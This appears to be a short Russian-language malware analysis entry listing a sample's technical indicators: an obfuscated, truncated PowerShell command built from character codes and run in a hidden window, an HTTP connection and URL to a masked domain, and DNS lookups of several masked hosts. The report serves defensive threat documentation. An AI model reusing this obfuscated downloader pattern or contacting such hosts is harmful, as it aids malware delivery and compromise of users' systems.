Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [STRiNg]::JOiN( '' ,( '20_124_67>65!13!94K85>71g29T95W82_90d85K83!68T16_126>85>68K30!103>85W82g115!92T89o85W94T68_11T20T119K65>66T13i23o88W68d68o64>10i31i31d71i71!71>30W67d88T81!94i87>66!89W92W...
- 'st####ergy.co.uk':80
- http://www.st####ergy.co.uk/JxbI/
- DNS ASK sh#####la-escapes.com
- DNS ASK si####ssity.co.uk
- DNS ASK st#####signcenter.es
- DNS ASK st####ergy.co.uk
- DNS ASK sh###eylamb.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [STRiNg]::JOiN( '' ,( '20_124_67>65!13!94K85>71g29T95W82_90d85K83!68T16_126>85>68K30!103>85W82g115!92T89o85W94T68_11T20T119K65>66T13i23o88W68d68o64>10i31i31d71i71!71>30W67d88T81!94i87>66!89W92W...' (со скрытым окном)